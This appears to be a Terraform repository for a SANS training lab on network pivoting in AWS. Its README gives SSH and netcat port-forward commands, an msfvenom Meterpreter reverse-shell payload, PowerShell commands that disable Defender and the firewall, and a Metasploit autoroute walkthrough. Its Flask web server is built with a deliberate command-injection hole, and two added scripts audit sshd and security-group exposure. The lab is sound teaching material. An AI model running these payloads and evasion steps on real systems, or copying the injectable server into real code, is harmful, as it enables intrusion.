├── .gitignore
├── Readme.md
├── assets
    ├── hosts
    ├── webserve.py
    └── webserve.service
├── main.tf
├── outputs.tf
├── scripts
    ├── linux-attack.yaml
    ├── linux-pivot.yaml
    ├── linux-target.yaml
    └── windows-pivot.yaml
└── variables.tf

/.gitignore:
--------------------------------------------------------------------------------
# Local .terraform directories
**/.terraform/*

# .tfstate files
*.tfstate
*.tfstate.*

# .terraform lock files
.terraform.lock.*

# Crash log files
crash.log

# Ignore any .tfvars files that are generated automatically for each Terraform run. Most
# .tfvars files are managed as part of configuration and so should be included in
# version control.
#
# example.tfvars

# Ignore override files as they are usually used to override resources locally and so
# are not checked in
override.tf
override.tf.json
*_override.tf
*_override.tf.json

# Include override files you do wish to add to version control using negated pattern
#
# !example_override.tf

# Include tfplan files to ignore the plan output of command: terraform plan -out=tfplan
# example: *tfplan*

--------------------------------------------------------------------------------
/Readme.md:
--------------------------------------------------------------------------------
# SANS Pivot Cheat Sheet Lab
This serves as a tool for cybersecurity enthusiasts to better understand pivoting through an environment. The central reference is the [SANS Pivot Cheat Sheet](https://www.sans.org/posters/pivot-cheat-sheet/). Some code is reused from Terraform's [HashiCorp Learn platform](https://learn.hashicorp.com/tutorials/terraform/cloud-init?in=terraform/provision). There's also a free [SANS webcast](https://www.sans.org/webcasts/getting-the-most-out-of-the-sans-pivot-cheat-sheet-2022/) using this repo and covering the cheat sheet. Enjoy!

## Dependencies
- [AWS IAM Credentials](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_access-keys.html) to interact with an AWS account
- [AWS CLI](https://docs.aws.amazon.com/cli/latest/userguide/getting-started-install.html) installed
- [Terraform](https://www.terraform.io/downloads.html) installed

## Files
- Readme.md: This file explains the repository
- main.tf: Overall architecture of the Terraform project
- variables.tf: Contains values used in production
- outputs.tf: Defines outputs requested from the build
- scripts/: YAML config files for instances
- assets/: Files copied to instances

## Setup Steps
### Create Keys and Apply to YAML Configs
- `ssh-keygen -t rsa -C "your_email@example.com" -f ../tf-cloud-init`
- Look for `ssh_authorized_keys:` in the YAML files in `scripts/`. Replace the example public keys with the contents of your new `tf-cloud-init.pub`. One-liner:
  - `sed -i "s:ssh-rsa.*$:$(cat ../tf-cloud-init.pub|tr -d '\n'):" ./scripts/*yaml`

### Set Default AWS Credentials
- Check to see what you have in your `~/.aws/credentials` file:
  - `cat ~/.aws/credentials`
- Set your current shell to use the right set:
  - `export AWS_PROFILE=Your-Favorite-IAM`

### Create the Range with Terraform
```
$ terraform init
[...]
Terraform has been successfully initialized!
[...]
$ terraform fmt
$ terraform validate
Success! The configuration is valid.
$ terraform apply
[...]
Do you want to perform these actions?
  Terraform will perform the actions described above.
  Only 'yes' will be accepted to approve.

  Enter a value: yes
[...]
Apply complete! Resources: 11 added, 0 changed, 0 destroyed.

Outputs:

linux_attack_private_ip = "10.1.1.1"
linux_attack_public_ip = "18.19.20.21"
linux_pivot_private_ip = "10.1.2.1"
linux_pivot_public_ip = "3.4.5.6"
linux_target_private_ip = "10.1.3.1"
linux_target_public_ip = "1.3.3.7"
sg_pivot = "sg-0123456789abcdef0"
vpc = "vpc-0123456789abcdef0"
$ terraform show #optional - to show assets and addresses again
```

### Optionally: Create a Windows Instance as Another Pivot
- From the AWS Console, Launch Instances
  - Name it _Windows-Pivot_
  - Optional: add a tag like "Project:PivotPlay"
  - Pick a Windows AMI - maybe Server 2022 (ami-0b9fc4f4583318dff)
  - Next, then _t2.micro_ is probably OK
  - Create a new key pair and **save** it; I'll call mine _pivot-labz_
  - Next, then VPC from the Terraform output
  - Set Auto-Assign public IP to _Enable_
  - Pick the _sg\_pivot_ security group
  - Under Advanced network configuration, set Primary IP addresses to _10.1.2.2_
  - Review, then _Launch instance_
  - Once the new instance is up, select it in the Instances view and Connect using the key you just created to get the password
- Optionally, you can do this with the AWS CLI:
  - `aws ec2 create-key-pair --key-name pivot-labz --region us-east-2`
  - Save the private key to something like `../pivot-labz.pem` so you can get the instance password later
  - `aws ec2 describe-subnets --region us-east-2` # to get the subnet-id for the next command
  - `aws ec2 run-instances --image-id ami-0b9fc4f4583318dff --count 1 --instance-type t2.micro --key-name pivot-labz --security-group-ids sg-0123456789abcdef0 --subnet-id subnet-6e7f829e --region us-east-2`
  - Noting the instance-id created, get the password with `aws ec2 get-password-data --instance-id i-0123456789abcdef0 --priv-launch-key ../pivot-labz.pem --region us-east-2`
- Then RDP in! `mstsc.exe`, connect as Administrator with your random password.

### Optional Windows Steps
- Install the Chocolatey package manager: `Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))`
- Install Nmap or other tools: `choco install nmap`
- Update the hosts file: `notepad.exe C:\Windows\System32\drivers\etc\hosts`
```
10.1.1.1 linux-attack
10.1.2.1 linux-pivot
10.1.2.2 windows-pivot
10.1.3.1 linux-target
```

### Connect to the Attack Machine with the IP from the Terraform Output
- `ssh attack@AttackIPHere -i ../tf-cloud-init`
- If you've lost track of those IPs, just `terraform show` to see them again

### Confirm You _Can't_ Get to the Target
- attack $ `nmap 10.1.2.1 10.1.3.1` or `nmap linux-pivot linux-target`
- attack $ `curl linux-pivot` # succeeds!
- attack $ `curl linux-target` # fails )-:

## Attack!

### Local Port Forward
- `scp -i ../tf-cloud-init ../tf-cloud-init attack@AttackIPHere:~/.ssh` # copy private key to the attack host
- `ssh -i ../tf-cloud-init attack@AttackIPHere` # connect to the attack host
- attack $ `ssh -i .ssh/tf-cloud-init pivot@linux-pivot` # verify you have access to the pivot host
- pivot $ `exit`
- attack $ `ssh -i .ssh/tf-cloud-init -fNL 1337:linux-target:80 pivot@linux-pivot`
- attack $ `curl localhost:1337` # success!

### Dynamic Port Forward
- attack $ `ssh -i .ssh/tf-cloud-init -D 9050 -fN pivot@linux-pivot`
- attack $ `proxychains curl linux-target` # success!
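
Both forwards above depend on the pivot's sshd permitting TCP forwarding, which is the OpenSSH default, and this lab's cloud-init also switches `GatewayPorts` to `yes`. The audit below is an added example, not part of this repository: it resolves global sshd_config settings the way sshd does (first value for a keyword wins, keywords are case-insensitive, globals end at the first `Match`) and lists the relay paths left open. Both sample configs are constructed, and `Include` files are not followed.

```python
import re

# OpenSSH defaults for the forwarding-related keywords (see sshd_config(5)).
DEFAULTS = {
    "allowtcpforwarding": "yes",
    "gatewayports": "no",
    "permittunnel": "no",
    "permitopen": "any",
}

# "Keyword value" or "Keyword=value"; keywords are case-insensitive.
LINE_RE = re.compile(r"^(\w+)(?:\s*=\s*|\s+)(.+)$")


def effective_global_settings(config_text):
    """Return the global value sshd would use for each tracked keyword."""
    seen = {}
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = LINE_RE.match(line)
        if not m:
            continue
        keyword = m.group(1).lower()
        value = m.group(2).strip().strip('"').lower()
        if keyword == "match":
            break  # later lines are conditional overrides, not globals
        if keyword in DEFAULTS and keyword not in seen:
            seen[keyword] = value  # first occurrence wins, as in sshd
    return {**DEFAULTS, **seen}


def pivot_findings(config_text):
    """List the relay paths this sshd leaves open to an authenticated user."""
    s = effective_global_settings(config_text)
    fwd = s["allowtcpforwarding"]
    local_ok = fwd in ("yes", "all", "local") and s["permitopen"] != "none"
    remote_ok = fwd in ("yes", "all", "remote")
    findings = []
    if local_ok:
        findings.append("local (-L) and dynamic (-D) forwarding allowed")
    if remote_ok:
        findings.append("remote (-R) forwarding allowed")
    if remote_ok and s["gatewayports"] in ("yes", "clientspecified"):
        findings.append("remote forwards may bind non-loopback addresses")
    if s["permittunnel"] != "no":
        findings.append("tun/tap tunnelling (-w) allowed")
    return findings


# Constructed sample: Ubuntu-style commented defaults after the lab's
# cloud-init ran sed "s/#GatewayPorts no/GatewayPorts yes/" on sshd_config.
LAB_PIVOT = """\
#AllowTcpForwarding yes
GatewayPorts yes
#PermitTunnel no
"""

# Constructed sample: a host that should not relay traffic. The later,
# lower-case AllowTcpForwarding line is ignored because the first one wins.
HARDENED = """\
AllowTcpForwarding no
GatewayPorts no
PermitTunnel no
allowtcpforwarding yes
"""

if __name__ == "__main__":
    for name, text in (("lab pivot", LAB_PIVOT), ("hardened", HARDENED)):
        print(f"{name}: {pivot_findings(text) or 'no relay paths'}")
```

On a live host, `sshd -T` prints the effective configuration and is the authoritative source; the parser above is for reviewing config files offline.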

### Netcat Port Forward
- attack $ `tmux`
- attack $ \b "
- attack $ `ssh -i .ssh/tf-cloud-init pivot@linux-pivot`
- pivot $ `mkfifo backpipe`
- pivot $ `nc -lvp 2000 0<backpipe | nc linux-target 80 1>backpipe`
- attack $ \b \
- attack $ `curl linux-pivot:2000` # success!

### Roll Meterpreter on Windows
- attack $ `msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=eth0 LPORT=8888 -f exe -o helper.exe` # create a payload
- attack $ `python3 -m http.server 8000` # serve it up; Ctrl-c later to end
- pivot PS> `Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend` # disable Defender
- pivot PS> `netsh advfirewall set allprofiles state off` # disable the host firewall
- pivot PS> `curl 10.1.1.1:8000/helper.exe -OutFile helper.exe` # grab the malware
- Build a resource file on attack $ `cat << EOF > catch8888.rc`
```
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST eth0
set LPORT 8888
run
EOF
```
- attack $ `msfconsole -r catch8888.rc` # start up Metasploit to catch the payload
- pivot PS> `.\helper.exe` # exploit yourself!

### Autoroute
- meterpreter > `background`
```
[*] Backgrounding session 1...
```
- msf6 > `use post/multi/manage/autoroute`
- msf6 post(multi/manage/autoroute) > `set subnet 10.1.3.0`
- msf6 post(multi/manage/autoroute) > `set session 1` # or whatever your Meterpreter session number is
- msf6 post(multi/manage/autoroute) > `run`
- msf6 post(multi/manage/autoroute) > `use auxiliary/scanner/portscan/tcp` # and now to check that it works!
- msf6 auxiliary(scanner/portscan/tcp) > `set RHOSTS linux-target`
- msf6 auxiliary(scanner/portscan/tcp) > `set PORTS 80`
- msf6 auxiliary(scanner/portscan/tcp) > `run`
```
[+] 10.1.3.1: - 10.1.3.1:80 - TCP OPEN # success!
```

## Tear Down Steps
- Go into AWS EC2, switch to the correct region, and terminate any Windows instances.
```
$ terraform destroy
[...]
Do you really want to destroy all resources?
  Terraform will destroy all your managed infrastructure, as shown above.
  There is no undo. Only 'yes' will be accepted to confirm.

  Enter a value: yes
[...]
Destroy complete! Resources: 11 destroyed.
$ terraform show #optional - to show assets and addresses again
```

--------------------------------------------------------------------------------
/assets/hosts:
--------------------------------------------------------------------------------
10.1.1.1 linux-attack
10.1.2.1 linux-pivot
10.1.2.2 windows-pivot
10.1.3.1 linux-target

--------------------------------------------------------------------------------
/assets/webserve.py:
--------------------------------------------------------------------------------
from flask import Flask, request
import os

app = Flask(__name__) # define app
stream = os.popen('ls /home/')
hostname = stream.read()

@app.route("/", methods=["GET","POST"])
def index():
    sourceIP = request.remote_addr
    if 'cmd' in request.args:
        injection = os.popen(request.args.get('cmd')).read()
    else:
        injection = ""
    code = f"""
    Intranet Site
    Company Page on {hostname}
    You are visiting from {sourceIP}. Welcome!
    {injection}

    """
    return code

if __name__ == "__main__":
    app.run(host='0.0.0.0', port=80, debug=True, threaded=True)

--------------------------------------------------------------------------------
/assets/webserve.service:
--------------------------------------------------------------------------------
[Unit]
Description=Insecure Python3 Web Service
After=network.target auditd.service
StartLimitIntervalSec=0

[Service]
ExecStart=/usr/bin/python3 /opt/webserve.py
ExecReload=/bin/kill -HUP $MAINPID
KillMode=process
Restart=on-failure
RestartSec=1
Type=simple

[Install]
WantedBy=multi-user.target
Alias=webserve.service

--------------------------------------------------------------------------------
/main.tf:
--------------------------------------------------------------------------------
terraform {
  required_version = ">= 0.13"
  required_providers {
    aws = {
      source  = "hashicorp/aws"
      version = "~> 3.0"
    }
  }
}


provider "aws" {
  region = var.region
}

data "aws_ami" "ubuntu" {
  most_recent = true

  filter {
    name   = "name"
    values = ["ubuntu/images/hvm-ssd/ubuntu-*20*-amd64-server-*"]
  }

  filter {
    name   = "virtualization-type"
    values = ["hvm"]
  }

  owners = ["099720109477"] # Canonical
}

resource "aws_vpc" "vpc" {
  cidr_block           = var.cidr_vpc
  enable_dns_support   = true
  enable_dns_hostnames = true
}

resource "aws_internet_gateway" "igw" {
  vpc_id = aws_vpc.vpc.id
}

resource "aws_subnet" "subnet_public" {
  vpc_id     = aws_vpc.vpc.id
  cidr_block = var.cidr_subnet
}

resource "aws_route_table" "rtb_public" {
  vpc_id = aws_vpc.vpc.id

  route {
    cidr_block = "0.0.0.0/0"
    gateway_id = aws_internet_gateway.igw.id
  }
}

resource "aws_route_table_association" "rta_subnet_public" {
  subnet_id      = aws_subnet.subnet_public.id
  route_table_id = aws_route_table.rtb_public.id
}

resource "aws_security_group" "sg_pivot" {
  name   = "sg_pivot"
  vpc_id = aws_vpc.vpc.id

  # Let it rip
  ingress {
    from_port   = 0
    to_port     = 0
    protocol    = "-1"
    cidr_blocks = ["0.0.0.0/0"]
  }

  egress {
    from_port   = 0
    to_port     = 0
    protocol    = "-1"
    cidr_blocks = ["0.0.0.0/0"]
  }
}

resource "aws_security_group" "sg_attack" {
  name   = "sg_attack"
  vpc_id = aws_vpc.vpc.id

  # Let it rip
  ingress {
    from_port   = 0
    to_port     = 0
    protocol    = "-1"
    cidr_blocks = ["0.0.0.0/0"]
  }

  egress {
    from_port   = 0
    to_port     = 0
    protocol    = "-1"
    cidr_blocks = ["0.0.0.0/0"]
  }
}

resource "aws_security_group" "sg_target" {
  name   = "sg_target"
  vpc_id = aws_vpc.vpc.id

  # Let it rip
  ingress {
    from_port   = 0
    to_port     = 0
    protocol    = "-1"
    cidr_blocks = ["10.1.2.0/23"]
  }

  egress {
    from_port   = 0
    to_port     = 0
    protocol    = "-1"
    cidr_blocks = ["0.0.0.0/0"]
  }
}

data "template_file" "linux_attack_data" {
  template = file("./scripts/linux-attack.yaml")
}

resource "aws_instance" "linux_attack" {
  ami                         = data.aws_ami.ubuntu.id
  instance_type               = "t2.micro"
  subnet_id                   = aws_subnet.subnet_public.id
  vpc_security_group_ids      = [aws_security_group.sg_attack.id]
  associate_public_ip_address = true
  user_data                   = data.template_file.linux_attack_data.rendered
  private_ip                  = "10.1.1.1"

  tags = {
    Name    = "Linux-Attack"
    Project = "PivotPlay"
  }
}

data "template_file" "linux_pivot_data" {
  template = file("./scripts/linux-pivot.yaml")
}

resource "aws_instance" "linux_pivot" {
  ami                         = data.aws_ami.ubuntu.id
  instance_type               = "t2.micro"
  subnet_id                   = aws_subnet.subnet_public.id
  vpc_security_group_ids      = [aws_security_group.sg_pivot.id]
  associate_public_ip_address = true
  user_data                   = data.template_file.linux_pivot_data.rendered
  private_ip                  = "10.1.2.1"

  tags = {
    Name    = "Linux-Pivot"
    Project = "PivotPlay"
  }
}

data "template_file" "linux_target_data" {
  template = file("./scripts/linux-target.yaml")
}

resource "aws_instance" "linux_target" {
  ami                         = data.aws_ami.ubuntu.id
  instance_type               = "t2.micro"
  subnet_id                   = aws_subnet.subnet_public.id
  vpc_security_group_ids      = [aws_security_group.sg_target.id]
  associate_public_ip_address = true
  user_data                   = data.template_file.linux_target_data.rendered
  private_ip                  = "10.1.3.1"
  # provisioner "file" {
  #   source = "./assets/webserve.py"
  #   destination = "/tmp/webserve2.py"
  #   connection {
  #     type = "ssh"
  #     user = "target"
  #     private_key = file("../tf-cloud-init")
  #     host = aws_instance.linux_target.public_ip
  #   }
  # }

  tags = {
    Name    = "Linux-Target"
    Project = "PivotPlay"
  }
}

# data "template_file" "windows_pivot_data" {
#   template = file("./scripts/windows-pivot.yaml")
# }
#
# resource "aws_instance" "windows_pivot" {
#   ami = "ami-0f8a21019cb8e9c33"
#   instance_type = "t2.micro"
#   subnet_id = aws_subnet.subnet_public.id
#   vpc_security_group_ids = [aws_security_group.sg_pivot.id]
#   associate_public_ip_address = true
#   user_data = data.template_file.windows_pivot_data.rendered
#   private_ip = "10.1.2.2"
#   tags = {
#     Name = "Windows-Target"
#     Project = "PivotPlay"
#   }
# }

--------------------------------------------------------------------------------
/outputs.tf:
--------------------------------------------------------------------------------
output "linux_attack_public_ip" {
  description = "Linux attack box public IP address"
  value       = aws_instance.linux_attack.public_ip
}

output "linux_attack_private_ip" {
  description = "Linux attack box private IP address"
  value       = aws_instance.linux_attack.private_ip
}

output "linux_pivot_public_ip" {
  description = "Linux pivot box public IP address"
  value       = aws_instance.linux_pivot.public_ip
}

output "linux_pivot_private_ip" {
  description = "Linux pivot box private IP address"
  value       = aws_instance.linux_pivot.private_ip
}

output "linux_target_public_ip" {
  description = "Linux target box public IP address"
  value       = aws_instance.linux_target.public_ip
}

output "linux_target_private_ip" {
  description = "Linux target box private IP address"
  value       = aws_instance.linux_target.private_ip
}

output "sg_pivot" {
  description = "Pivot Security Group"
  value       = aws_security_group.sg_pivot.id
}

output "vpc" {
  description = "Pivot Range VPC"
  value       = aws_vpc.vpc.id
}

# output "windows_pivot_public_ip" {
#   description = "Windows pivot box public IP address"
#   value = aws_instance.windows_pivot.public_ip
# }

--------------------------------------------------------------------------------
/scripts/linux-attack.yaml:
--------------------------------------------------------------------------------
#cloud-config
# Add groups to the system
# Adds the ubuntu group with members 'root' and 'sys'
# and the empty group attack.
groups:
  - ubuntu: [root,sys]
  - attack

# Add users to the system. Users are added after groups are added.
users:
  - default
  - name: attack
    gecos: attack
    shell: /bin/bash
    primary_group: attack
    sudo: ALL=(ALL) NOPASSWD:ALL
    groups: users, admin
    lock_passwd: false
    ssh_authorized_keys:
      - ssh-rsa YourPublicKeyHere

# Install packages; each package needs its own list item
packages:
  - ncat
  - nmap
# - golang-go

write_files:
  - content: ${filebase64("./assets/hosts")}
    encoding: b64
    owner: root:root
    path: /etc/hosts
    permissions: '0644'

# Set up asset
runcmd:
  - whoami > /tmp/who.txt
  - sudo apt -y install nmap ncat python3 net-tools proxychains socat
  - sudo sed -i "s/#GatewayPorts no/GatewayPorts yes/" /etc/ssh/sshd_config
  - sudo systemctl restart sshd.service
  - curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
  - chmod 755 msfinstall && \
  - sudo ./msfinstall
  - rm msfinstall

# - sudo su terraform
# - sudo mkdir /home/terraform/go
# - sudo chown terraform:hashicorp /home/terraform/go
# - export GOPATH=/home/terraform/go
# - go get github.com/hashicorp/learn-go-webapp-demo

--------------------------------------------------------------------------------
/scripts/linux-pivot.yaml:
--------------------------------------------------------------------------------
#cloud-config
# Add groups to the system
# Adds the ubuntu group with members 'root' and 'sys'
# and the empty group pivot.
groups:
  - ubuntu: [root,sys]
  - pivot

# Add users to the system. Users are added after groups are added.
users:
  - default
  - name: pivot
    gecos: pivot
    shell: /bin/bash
    primary_group: pivot
    sudo: ALL=(ALL) NOPASSWD:ALL
    groups: users, admin
    lock_passwd: false
    ssh_authorized_keys:
      - ssh-rsa YourPublicKeyHere

# Install packages; each package needs its own list item
packages:
  - ncat
  - nmap
# - golang-go

write_files:
  - content: ${filebase64("./assets/hosts")}
    encoding: b64
    owner: root:root
    path: /etc/hosts
    permissions: '0644'
  - content: ${filebase64("./assets/webserve.py")}
    encoding: b64
    owner: root:root
    path: /opt/webserve.py
    permissions: '0755'
  - content: ${filebase64("./assets/webserve.service")}
    encoding: b64
    owner: root:root
    path: /etc/systemd/system/webserve.service
    permissions: '0755'

# Set up asset
runcmd:
  - whoami > /tmp/who.txt
  - sudo apt -y install nmap ncat python3 python3-pip net-tools socat
  - sudo pip3 install flask --upgrade
  - sudo sed -i "s/#GatewayPorts no/GatewayPorts yes/" /etc/ssh/sshd_config
  - sudo systemctl restart sshd.service
  - sudo systemctl enable webserve.service
  - sudo systemctl start webserve.service

--------------------------------------------------------------------------------
/scripts/linux-target.yaml:
--------------------------------------------------------------------------------
#cloud-config
# Add groups to the system
# Adds the ubuntu group with members 'root' and 'sys'
# and the empty group target.
groups:
  - ubuntu: [root,sys]
  - target

# Add users to the system. Users are added after groups are added.
users:
  - default
  - name: target
    gecos: target
    shell: /bin/bash
    primary_group: target
    sudo: ALL=(ALL) NOPASSWD:ALL
    groups: users, admin
    lock_passwd: false
    ssh_authorized_keys:
      - ssh-rsa YourPublicKeyHere

# Install packages; each package needs its own list item
packages:
  - ncat
  - nmap
# - golang-go

write_files:
  - content: ${filebase64("./assets/hosts")}
    encoding: b64
    owner: root:root
    path: /etc/hosts
    permissions: '0644'
  - content: ${filebase64("./assets/webserve.py")}
    encoding: b64
    owner: root:root
    path: /opt/webserve.py
    permissions: '0755'
  - content: ${filebase64("./assets/webserve.service")}
    encoding: b64
    owner: root:root
    path: /etc/systemd/system/webserve.service
    permissions: '0755'

# Set up asset
runcmd:
  - whoami > /tmp/who.txt
  - sudo apt -y install nmap ncat python3 python3-pip net-tools
  - sudo pip3 install flask --upgrade
  - sudo sed -i "s/#GatewayPorts no/GatewayPorts yes/" /etc/ssh/sshd_config
  - sudo systemctl restart sshd.service
  - sudo systemctl enable webserve.service
  - sudo systemctl start webserve.service
  - echo "Hacking for cash monies!" > /opt/secrets.txt

--------------------------------------------------------------------------------
/scripts/windows-pivot.yaml:
--------------------------------------------------------------------------------
#cloud-config
# Add groups to the system
# Adds the ubuntu group with members 'root' and 'sys'
# and the empty group pivot.
groups:
  - ubuntu: [root,sys]
  - pivot

# Add users to the system. Users are added after groups are added.
users:
  - default
  - name: pivot
    gecos: pivot
    shell: /bin/bash
    primary_group: pivot
    groups: users, admin
    lock_passwd: false
    ssh_authorized_keys:
      - ssh-rsa YourPublicKeyHere

# Install packages; each package needs its own list item
packages:
  - ncat
  - nmap
# - golang-go

write_files:
  - content: |
      10.1.1.1 linux-attack
      10.1.2.1 linux-pivot
      10.1.2.2 windows-pivot
      10.1.3.1 linux-target
    owner: root:root
    path: \windows\system32\drivers\etc\hosts

# Set up asset
runcmd:
  - whoami > \who.txt

--------------------------------------------------------------------------------
/variables.tf:
--------------------------------------------------------------------------------
variable "cidr_vpc" {
  description = "CIDR block for the VPC"
  default     = "10.1.0.0/16"
}

variable "cidr_subnet" {
  description = "CIDR block for the subnet"
  default     = "10.1.0.0/18"
}

variable "region" {
  description = "The region Terraform deploys your instance"
  default     = "us-east-2"
}

--------------------------------------------------------------------------------
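
All lab hosts sit in the single subnet from `variables.tf`, so the attack host is kept away from the target only by the `sg_target` ingress rule in `main.tf`. The check below is an added example, not part of this repository: with the ingress CIDRs transcribed from `main.tf` and the addresses from `assets/hosts` (function names are illustrative), it computes who can connect to whom, which hosts sit between the attack box and the target, and which groups accept traffic from anywhere.

```python
import ipaddress

# Ingress CIDRs per security group, transcribed from main.tf (all protocols).
INGRESS = {
    "sg_attack": ["0.0.0.0/0"],
    "sg_pivot": ["0.0.0.0/0"],
    "sg_target": ["10.1.2.0/23"],
}

# Private address (assets/hosts) and security group of each lab instance.
# windows-pivot is the optional, manually launched instance from the README.
HOSTS = {
    "linux-attack": ("10.1.1.1", "sg_attack"),
    "linux-pivot": ("10.1.2.1", "sg_pivot"),
    "windows-pivot": ("10.1.2.2", "sg_pivot"),
    "linux-target": ("10.1.3.1", "sg_target"),
}

SUBNET = ipaddress.ip_network("10.1.0.0/18")  # cidr_subnet in variables.tf


def single_subnet():
    """True when no routing boundary separates the hosts, only group rules."""
    return all(ipaddress.ip_address(ip) in SUBNET for ip, _ in HOSTS.values())


def admits(group, src_ip):
    """Does any ingress rule of the group accept this source address?"""
    src = ipaddress.ip_address(src_ip)
    return any(src in ipaddress.ip_network(cidr) for cidr in INGRESS[group])


def reachability():
    """Map each host to the sorted list of other hosts it may connect to."""
    return {
        src: sorted(
            dst for dst, (_, grp) in HOSTS.items()
            if dst != src and admits(grp, src_ip)
        )
        for src, (src_ip, _) in HOSTS.items()
    }


def intermediaries(origin, target):
    """Hosts origin can reach that can themselves reach target.

    Returns an empty list when origin already reaches target directly.
    """
    reach = reachability()
    if target in reach[origin]:
        return []
    return [hop for hop in reach[origin] if target in reach[hop]]


def world_open_groups():
    """Security groups with an ingress rule covering every IPv4 address."""
    return sorted(
        g for g, cidrs in INGRESS.items()
        if any(ipaddress.ip_network(c).prefixlen == 0 for c in cidrs)
    )


if __name__ == "__main__":
    print("single subnet:", single_subnet())
    for host, peers in reachability().items():
        print(f"{host} -> {', '.join(peers)}")
    print("between attack and target:",
          intermediaries("linux-attack", "linux-target"))
    print("open to 0.0.0.0/0:", world_open_groups())
```

Outside a throwaway lab, the two groups reported by `world_open_groups()` are the first thing to narrow, typically to the operator's own address.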